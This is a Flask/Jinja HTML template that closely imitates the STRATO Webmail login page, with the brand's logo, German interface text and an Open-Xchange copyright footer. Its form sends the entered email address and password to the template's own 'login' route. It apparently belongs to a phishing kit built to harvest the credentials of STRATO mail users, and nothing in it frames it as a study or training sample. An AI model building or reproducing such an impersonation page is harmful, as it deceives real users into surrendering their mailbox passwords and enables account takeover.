<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <link
      rel="stylesheet"
      href="https://cdn.jsdelivr.net/npm/bootstrap-icons@1.11.3/font/bootstrap-icons.min.css"
    />
    <link
      rel="stylesheet"
      href="{{ url_for('static',  filename= '/css/style.css' ) }}"
    />
    <title>Login - STRATO Webmail</title>
  </head>
  <body>
    <div class="main">
      <div class="main-img">
        <img src="{{ url_for('static' ,filename =
        "/image/logo_strato_white.svg") }}" alt="" />
      </div>
      <div class="contain">
        <div class="contain-tag">
          <i class="bi bi-question-circle-fill"></i>
          <a href="">Hilfe & Kontakt </a>
        </div>
        <div class="contain-label">
          <i class="bi bi-globe-asia-australia"></i>
          <label>Deutsch</label>
        </div>
        <div class="btn">
          <a href="">Kunden-Login</a>
        </div>
      </div>
    </div>
    <form id="form" class="form" method="post" action="{{ url_for('login') }}">
      <div class="form-header">
        <i class="bi bi-envelope-fill"></i>
        <p>STRATO Webmail</p>
      </div>
      <div class="form-title">
        <h2>Login</h2>
      </div>
      <div class="form-input">
        <div class="form-control">
          <label>E-Mail Adresse</label>
          <i class="bi bi-envelope-fill"></i>
          <input type="email" id="email" name="email" required />
        </div>
        <div class="form-control">
          <label>Passwort</label>
          <i class="bi bi-lock-fill"></i>
          <input
            type="password"
            id="password"
            name="password"
            value=""
            required
          />
          <a href="">Passwort vergessen</a>
        </div>
      </div>
      <div class="form-check">
        <input type="checkbox" /><span>Angemeldet bleiben</span>
      </div>
      <div class="form-btn">
        <small class="small"></small>
        <button type="submit" class="btn" id="btn" value="Submit">
          Anmelden
        </button>
      </div>
    </form>

    <div class="footer-section">
      <footer class="footer-tag">
        <div class="footer-link">
          <a href="">STRATO.de</a>
          <a href="">AGB</a>
          <a href="">Datenschutz</a>
          <a href="">Impressum</a>
        </div>
        <div class="footer-link-tag">
          <i class="bi bi-c-circle"></i><span> 2024 Open-Xchange GmbH</span>
          <p>Version: 7.10.6</p>
        </div>
      </footer>
    </div>
  </body>
  <script src="{{ url_for('static', filename='js/index.js') }}"></script>
</html>
